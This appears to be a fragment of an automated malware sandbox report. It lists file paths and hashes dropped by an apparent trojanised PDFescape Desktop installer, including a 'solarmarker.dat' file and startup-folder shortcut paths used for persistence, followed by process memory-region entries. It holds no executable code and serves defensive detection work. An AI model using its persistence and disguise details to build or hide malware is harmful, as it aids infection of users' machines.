SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
C:\ProgramData\PDFescape Desktop\Installation\pdfescape-desktop-startup-4.0.24.4617-x64.msiMD5
692a85c10d2e69d290a14aef95aae86f
SHA1381b06c12ac1fdcb1aaef79eb376b1f8d8f1c0e1
SHA25665f598aef6b4ff4cdd5efe63ad7d91f5014c53c5afbfc20e215e7427cc84a84d
SHA51238a67af0d1f593680e3da8e920ce9bf0e831168aebf4be2fc0fca34835d43e809103316b3cdaf71156aeea72139e0285eecefa6d391c4af2b9ea55745ec0d933
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5MD5
0dd2832c3de67e2bd6bbc2061308c7f3
SHA1e9486e3de283b08b094556f91e81bd17d7e25be2
SHA256a55858addebe5c10572a0056b6fe4cee19ea392d41647d408d0d275bc5697f3a
SHA51231c771ebfbc697f604397a46ceecea1226cfa7c3b17817458c770b95481bbbcc571f3b58a0adca75466e2ed466f9d91a14c40b3963a34b95fb1b9715aaf9074b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299MD5
ae95e79229dc82d4ab535d5b74fd6ce9
SHA196f9949f4878dd59781e9edfe58793cebc068c4b
SHA2560d7ca357ae030152e06e327ffce34335b9bbb019f74a1e0637ca4f2ed4a36ed3
SHA512b86c685eb27972c388ebadfb1c1926abe898226c5cfa353098911d0aad8979f234984ffe8e07abdfeb80def95466f4e76d2d6aab22ecdfca41e14b39e65f83fc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5MD5
658932b90137ac6ca0e096769777e115
SHA172dc37134a70cefbf803351331bb68a422834c8e
SHA256cb0c49a84874d0963ec43c19c0d3adddc0c3789fe01da00f3ff30c2341c5b8e9
SHA512ae7bbc5e638b7e023e687ba13791f3cca9264794567667b8db484993978e6c800a70441a427573ae7cb91af081d2f1d8357729eed928f3a23882612fda9caabc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299MD5
bf4566680139f0ee845f1381368947cb
SHA1cf283c4533070753dd71e31a91d21fa8543f157e
SHA2564de8549a851c54ef0cdea39aaccd2ea87e40084815cec2d6fd871d664d20ca92
SHA5123be487bdb5b58b65ed8587c462a80181774b6c3d9378f78c0a612c453c845d502fe86f7aa7477211923e2f62b889494e919bd38ea6577924eb11b460c19fda47
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc
SHA175c07243f9cb80a9c7aed2865f9c5192cc920e7e
SHA25691ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
SHA512db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
-
C:\Users\Admin\AppData\Local\Temp\is-6J7C8.tmp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmpMD5
0dc8e93706ff1b10cd6d60ab0ec15d88
SHA19e9c66127ba35ca4ee66fb3fa8820a683d4c943e
SHA2563b79aab07b9461a9d4f3c579555ee024888abcda4f5cc23eac5236a56bf740c7
SHA5120dbbd64f27055997279e36254ba2515b3672b41ef037777fd7490c0d0fa22f791934b483d281a33e542d9f5ee48bac73f2817e1dd93b0e3484c4c5653c8dbf66
-
C:\Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\PDFescape_Desktop_Installer.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\PDFescape_Desktop_Installer.exeMD5
87d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
e1e3519302ca4dabf79abd88d7912e7a
SHA194efdff60edb157267eaa3acd3267568ab7ea769
SHA2563fd4de0e749ccd33447957c9330d0fe9e349fe654b9933522a657bc95766c1ba
SHA51203879c53e8ddd4e1c78624e7a0824ee190cff5b3f47162228b503d04268522a290e668d67f46578f46c4b6c56636f98ec185b065b0d527826516db7fe80289ea
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
e1e3519302ca4dabf79abd88d7912e7a
SHA194efdff60edb157267eaa3acd3267568ab7ea769
SHA2563fd4de0e749ccd33447957c9330d0fe9e349fe654b9933522a657bc95766c1ba
SHA51203879c53e8ddd4e1c78624e7a0824ee190cff5b3f47162228b503d04268522a290e668d67f46578f46c4b6c56636f98ec185b065b0d527826516db7fe80289ea
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
075847bbbcd951286905ee7185b4428b
SHA12a383a14fba21ba931e9d032e0ff81bb8c5e7a08
SHA2560ce78bd25d8df577dad184e2be7a40b58eb2925080d3497b351629a978bd8916
SHA512d57d99cc938737e1b4bcca70320af29d7ed961816155fac0ffe422f003153c7a67f7a7d9c9cf8aae122983b26f63358a3998607df148a4cc4581742a3d449bee
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
075847bbbcd951286905ee7185b4428b
SHA12a383a14fba21ba931e9d032e0ff81bb8c5e7a08
SHA2560ce78bd25d8df577dad184e2be7a40b58eb2925080d3497b351629a978bd8916
SHA512d57d99cc938737e1b4bcca70320af29d7ed961816155fac0ffe422f003153c7a67f7a7d9c9cf8aae122983b26f63358a3998607df148a4cc4581742a3d449bee
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
99b0c886e5700b6b843fa0d8979f0604
SHA1d730661df7ec0eabec18b07c13433063f0e2048a
SHA2569913fb9153d6ad9ef836ee0f48b1b17f1e535a22ab7774da6eb62220ed278d97
SHA5124fecf15b5f03e482adbb574af9b31135304e594d7a4ffbd169c03051b7122416ba13c887309f30c2ca0896444c6579e8de9f4d7c6e27896541d0c85ba0893c84
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
e26d9ece8d85162d7921e151f52dae07
SHA1d75e501ffe9af536b6a9bf2fdd6c42e7c1261b7a
SHA25657dafed76785661fbd2bebeb04ecdb1501997734f0b6a269f5a8e6d59b6006db
SHA5124ad656e5f93f8ff6b486fde74b8203bcf7dfdfc2d9e84ac57ede16f4a7233269cdfb5a03ed35d4327e73f6cfa0d9e82185a5a106a536c225a90300d223943c1d
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
0401ce3540201bd91bd08f80246d10c9
SHA151ef2ce98b354aabd11381a5b42ebcd8e6a30c8b
SHA256a351329439cc6ac171e05ad07356fb87c00b4bfcc15aa735ac120055b714da74
SHA512314276a70f351ecbd8e330a270624367ef702696c6673a285bb87cba9a972b0ed0a5f275cc842d4c9bde005ec05d2cdef48ad02a8033b87a33e6618e46c79169
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
340d27b63fafc4049fff324e72668717
SHA195811f67c2bfbcf28ca24c36f68b2cfdeab1511d
SHA256530a2467c97d94a1b5c053432f83ce74d64d30590f8188376e5304ba8cee2042
SHA5120fdd5271a3814496dd6c72b1291b27baa51f825cd5687362477d1e4c7984daac744a6e628dee2ebb94125793b1e1e182255f75e92a037309cfb7efeff8275bf7
-
C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNkMD5
2be12208707f97a3075dd24297a68444
SHA167b368397c4bc370db25d584b2ead03c15dca389
SHA2566dc9f217d76c10c1d9c319a3a831b255ca68d088b96ae2d269a6806d99685d3d
SHA51201d27d24173720e3c5d0bd0b7a6351abaf6a57a3f513912e9a906c92509a4df4effab613661e9254188c246a128197f561ae72bca373865eab7e1da27d61f24c
-
C:\Users\Admin\appdata\roaming\solarmarker.datMD5
821bd77ad1baa30c3f824594b2896476
SHA11e59c4dc0b698f526649342257cddaf19e1585c7
SHA25683d3d260ecfbf9aad34ce0f019937948269c6c7dcbfc39512a40bf4ee3a743f1
SHA512e2a053ecd89cb986f2f52d11794b6e0d9e63e6756fb421fb21b38f4e3272cbf12c4a2a76b861ae5786235fa3716ddce1001c17a37326c8a690e8021211f1ec3e
-
C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618bMD5
f49af433f9076c15cab2d858be35b939
SHA119fb76407184356e82560714f225a323ec19abc9
SHA256c9a510a5ea2d8575aa2f33691de5bae9c6086a5ced125a8ca1d6cb41463a5154
SHA51289163a3cd141906d559711a31a42e0153715eb54c9f5ec25395f34ab338270d98723e0e4bbad57a34440a49886194e58beb0048cd7c4cf9e432ffbaab52fe40c
-
\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dllMD5
a733c1f89219252497e94cbc66272478
SHA1f5f9be9a2345f6dc0414c3b62b4087faa32ce351
SHA256557bb1a545eac9c352dbbe15fbf383d29c6b2640b8cf74e49fefcdee97270547
SHA512875b4958cadbd8901f4fcb6c5c12f24e2112dbd287975134c6f83573d6ce679be0058dc259ab1db31a64dc48470622c80e75555e43a240e63854df859b65e0bd
-
\Program Files\PDFescape Desktop\atom.dllMD5
9148f07e6dedce3e8e6a642fba0402d8
SHA12e403f6b65bf4519d0883ebb0025d77130105a1c
SHA25635bd82d881759b2aa8ef6dc6e26d0943a19593b2192d207b4440c6e1a29ba05a
SHA5128f7ab028af2b782df35bf9940a8f367ac49f015d8302242d553e9437882b1fb76ebc91f3dfe2faadd2cde07af260e8ad140e3a59f0f44c05188ebf2bcfe016cb
-
\Program Files\PDFescape Desktop\brand.dllMD5
594a3e3adcf139e7b20eddd1f16131d3
SHA17700c89b10e779fc6db72b42be0a81fe89378f9a
SHA25652163973b0cf8d46bcd1fb26c58f8ab2f7b31fb7e2b05ded2b59ae8d4e2332ad
SHA512d1240865fc5bfcd0c17205ce866be49b76ae31fccaaa724859822a6311e0e5bb6df2642b5659c1ad20414d79c6c9abbe74419ad4474fa71cbc4e8cab57d0c7cc
-
\Program Files\PDFescape Desktop\context-menu.dllMD5
2c9f26866787b200996d99ad160be2b2
SHA1fec80f5b4a6acf29f74a2bc8918298518a487597
SHA2564e3a2ed474ffdb02b4a177cd748cdb31b63f1f1fe3c32bf64cedfc06b6528a57
SHA5129ade4951f2297ad233bbd41103c8a686a6098cdb2f88ad63eec8742e3bacb85fc02357a58163139259274ed6f3a1299d07b7b7db43bf8eb539c1e0fec018d6dd
-
\Program Files\PDFescape Desktop\encoding-conversion.dllMD5
448a6de619faf0f403c897b142f619c5
SHA1e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2
SHA25600a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51
SHA512f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d
-
\Program Files\PDFescape Desktop\libcurl.dllMD5
140cdda2f51d89dc194a8b8c3ab9e463
SHA1255180975a70d00d31d516ecc895e42fd18c24bf
SHA256a30c086bb16c702985df2193d1e52cfb15b978a679de014b449a95eb9a233c15
SHA5125065efa34b3289be247a5bc3f677afae7a86753fc37f816da70d54d1986b6dfe8cc73ad13900020a99fec7de71bd4d23e02bf73fab6be220db1c65482ca860a4
-
\Program Files\PDFescape Desktop\libssl-1_1-x64.dllMD5
62dc606e7f85f8f15a582a045e394d19
SHA1bad647ebb9207e2b20d464c6b420c84b971519d2
SHA2567a91d83167c864b5381667370b95fe6081290c61356c90def9a25cf7b3d9c411
SHA512d7e8c1e9abf695db2b1038c5231ccbc3c2cfd89171e4df3d7a13d8979c096772feace7dacbbb347a657e4e5519240813f8953b75c80259cd256245a9ef2f7e8f
-
\Program Files\PDFescape Desktop\pdfcore.dllMD5
c10d1adf13c2edde02e6adf49d1c900b
SHA14455fc9f229dedf4dd5622e6675c7a03ac8bd4d6
SHA2566e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44
SHA5120768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe
-
\Program Files\PDFescape Desktop\pdfgraphics.dllMD5
1fc38631bf08eff07e8466f69ce90a46
SHA13973584e1371dfb26ae31cb4b555c972bd30f5a4
SHA25678c09e4d384f1b3df9e9e00798f5f048b41866af5e0c16b7e463e6bdd695ec89
SHA5125818d9f22cf865c12b08f684cb3cced4f55036f78df36d88cdb2530134f3db3170729b1212598ce6371c67ddd9eb887ff3e1fc551c258ee0ce3bd722529a63db
-
\Program Files\PDFescape Desktop\pdfview.dllMD5
40ca796430abed5d369f0781af26481e
SHA149abef703e2c9c70e691d8971505691402c2e745
SHA256e303c331da06258aa0f726ae95dc51f65bb3de88e8fa431a7542e867e208ad19
SHA51238a5be054afaddc28345860f23bb5824d8079b27d97862917a345460de7c131b8fbf41451248cc7efd60596cd5e0202160c9710992bac073b88b2b83074fa5b8
-
\Program Files\PDFescape Desktop\preview-handler.dllMD5
0a58eba4b339c0bb6f44a314ee06d7c7
SHA1136b337a2c80fce2e4c0732fe5c821d58aad7d40
SHA25632dbc446d09e062568989bace5cc19772e2dbeccec681dd8f38ef27cf5aab47a
SHA51218d664f0242412a2e0acece5a7a8de5f1be6816b80b5665192bab2d2868e682ef43cd275d8be276ef909663bd11233c972c5f7856a32663f3876ca5a8475ad85
-
\Program Files\PDFescape Desktop\root-service-provider.dllMD5
58c639f842629bf97596add29b0ad19c
SHA1059b152148a8fb92f9b8f119fa95608240ea2957
SHA25640b0061cec34d9e7ce84b01a3d30e9d7eb2bcd71b9110b06680767ec7f9da503
SHA512f304dd099df5e63ebea6f87a27b718bf7f1d7b995f77ea9cb0cbcbdc621d999eb5a1eca76b50a6e96a7e5e8d136e050fdcd04b9894743f254665537e35ad473a
-
\Program Files\PDFescape Desktop\thumbnail-handler.dllMD5
5c467cd8042003e71597dccb53a03bfb
SHA1134db7349cfc485ee5f32b9583210843e02acdda
SHA2562f6c64fe4b3c69d4f2235a461d74497e37c0eb3fb2432191370c2430848d5c85
SHA512b1782bd052e98cfd026067992180764965fcfec3c9b840512d522f0ed2278920616ac292d6332b9be0b5829c33bcabc4409bc0fceafe17290b1b13cc3a67dd99
-
\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
\ProgramData\PDFescape Desktop\Installation\Statistics.dllMD5
e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
\Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\_isetup\_isdecmp.dllMD5
c6ae924ad02500284f7e4efa11fa7cfc
SHA12a7770b473b0a7dc9a331d017297ff5af400fed8
SHA25631d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae
-
\Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\_isetup\_isdecmp.dllMD5
c6ae924ad02500284f7e4efa11fa7cfc
SHA12a7770b473b0a7dc9a331d017297ff5af400fed8
SHA25631d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae
-
memory/1832-114-0x0000000000400000-0x0000000000501000-memory.dmpFilesize
1.0MB
-
memory/1840-115-0x0000000000000000-mapping.dmp
-
memory/1840-121-0x00000000009E0000-0x00000000009E1000-memory.dmpFilesize
4KB
-
memory/1840-119-0x0000000003601000-0x0000000003605000-memory.dmpFilesize
16KB
-
memory/2104-125-0x0000000000000000-mapping.dmp
-
memory/2332-135-0x0000000000000000-mapping.dmp
-
memory/2332-165-0x0000000004750000-0x0000000004751000-memory.dmpFilesize
4KB
-
memory/2332-218-0x0000000004752000-0x0000000004753000-memory.dmpFilesize
4KB
-
memory/2332-228-0x0000000004753000-0x0000000004754000-memory.dmpFilesize
4KB
-
memory/2744-198-0x0000000007CD0000-0x0000000007CD1000-memory.dmpFilesize
4KB
-
memory/2744-207-0x0000000007DB0000-0x0000000007DB1000-memory.dmpFilesize
4KB
-
memory/2744-194-0x0000000007500000-0x0000000007501000-memory.dmpFilesize
4KB
-
memory/2744-229-0x0000000007063000-0x0000000007064000-memory.dmpFilesize
4KB
-
memory/2744-217-0x0000000007062000-0x0000000007063000-memory.dmpFilesize
4KB
-
memory/2744-202-0x0000000007D40000-0x0000000007D41000-memory.dmpFilesize
4KB
-
memory/2744-205-0x0000000007060000-0x0000000007061000-memory.dmpFilesize
4KB
-
memory/2744-134-0x0000000000000000-mapping.dmp
-
memory/2792-300-0x0000000000000000-mapping.dmp
-
memory/3564-122-0x0000000000000000-mapping.dmp
-
memory/3808-128-0x0000000000000000-mapping.dmp
-
memory/3948-133-0x0000000000000000-mapping.dmp
-
memory/3948-226-0x0000000006633000-0x0000000006634000-memory.dmpFilesize
4KB
-
memory/3948-154-0x0000000006C70000-0x0000000006C71000-memory.dmpFilesize
4KB
-
memory/3948-149-0x0000000006580000-0x0000000006581000-memory.dmpFilesize
4KB
-
memory/3948-214-0x0000000006632000-0x0000000006633000-memory.dmpFilesize
4KB
-
memory/3948-161-0x0000000006630000-0x0000000006631000-memory.dmpFilesize
4KB
-
memory/3992-220-0x00000000064E2000-0x00000000064E3000-memory.dmpFilesize
4KB
-
memory/3992-210-0x00000000064E0000-0x00000000064E1000-memory.dmpFilesize
4KB
-
memory/3992-136-0x0000000000000000-mapping.dmp
-
memory/3992-235-0x00000000064E3000-0x00000000064E4000-memory.dmpFilesize
4KB
-
memory/4132-164-0x00000000046B0000-0x00000000046B1000-memory.dmpFilesize
4KB
-
memory/4132-171-0x00000000046B2000-0x00000000046B3000-memory.dmpFilesize
4KB
-
memory/4132-231-0x00000000046B3000-0x00000000046B4000-memory.dmpFilesize
4KB
-
memory/4132-137-0x0000000000000000-mapping.dmp
-
memory/4172-138-0x0000000000000000-mapping.dmp
-
memory/4172-176-0x00000000066C2000-0x00000000066C3000-memory.dmpFilesize
4KB
-
memory/4172-234-0x00000000066C3000-0x00000000066C4000-memory.dmpFilesize
4KB
-
memory/4172-185-0x00000000066C0000-0x00000000066C1000-memory.dmpFilesize
4KB
-
memory/4256-173-0x0000000004E60000-0x0000000004E61000-memory.dmpFilesize
4KB
-
memory/4256-144-0x0000000000000000-mapping.dmp
-
memory/4256-233-0x0000000004E63000-0x0000000004E64000-memory.dmpFilesize
4KB
-
memory/4256-180-0x0000000004E62000-0x0000000004E63000-memory.dmpFilesize
4KB
-
memory/4332-147-0x0000000000000000-mapping.dmp
-
memory/4332-232-0x0000000005313000-0x0000000005314000-memory.dmpFilesize
4KB
-
memory/4332-190-0x0000000005312000-0x0000000005313000-memory.dmpFilesize
4KB
-
memory/4332-183-0x0000000005310000-0x0000000005311000-memory.dmpFilesize
4KB
-
memory/4400-227-0x0000000006AF3000-0x0000000006AF4000-memory.dmpFilesize
4KB
-
memory/4400-189-0x0000000006AF0000-0x0000000006AF1000-memory.dmpFilesize
4KB
-
memory/4400-153-0x0000000000000000-mapping.dmp
-
memory/4400-197-0x0000000006AF2000-0x0000000006AF3000-memory.dmpFilesize
4KB
-
memory/4476-159-0x0000000000000000-mapping.dmp
-
memory/4476-193-0x0000000006A40000-0x0000000006A41000-memory.dmpFilesize
4KB
-
memory/4476-201-0x0000000006A42000-0x0000000006A43000-memory.dmpFilesize
4KB
-
memory/4476-230-0x0000000006A43000-0x0000000006A44000-memory.dmpFilesize
4KB
-
memory/7012-301-0x0000000000000000-mapping.dmp
-
memory/7700-264-0x0000000000000000-mapping.dmp
-
memory/8076-294-0x0000000000000000-mapping.dmp
-
memory/8596-304-0x0000000000000000-mapping.dmp
-
memory/10120-261-0x0000000000000000-mapping.dmp
-
memory/10820-305-0x0000000000000000-mapping.dmp
-
memory/10824-273-0x0000000000000000-mapping.dmp
-
memory/11140-295-0x0000000000000000-mapping.dmp
-
memory/11876-297-0x0000000000000000-mapping.dmp
-
memory/12332-302-0x0000000000000000-mapping.dmp
-
memory/13076-303-0x0000000000000000-mapping.dmp
-
memory/13416-276-0x0000000000000000-mapping.dmp
-
memory/14080-298-0x0000000000000000-mapping.dmp
-
memory/16564-279-0x0000000000000000-mapping.dmp
-
memory/17588-299-0x0000000000000000-mapping.dmp
-
memory/18156-256-0x0000000000000000-mapping.dmp
-
memory/19072-296-0x0000000000000000-mapping.dmp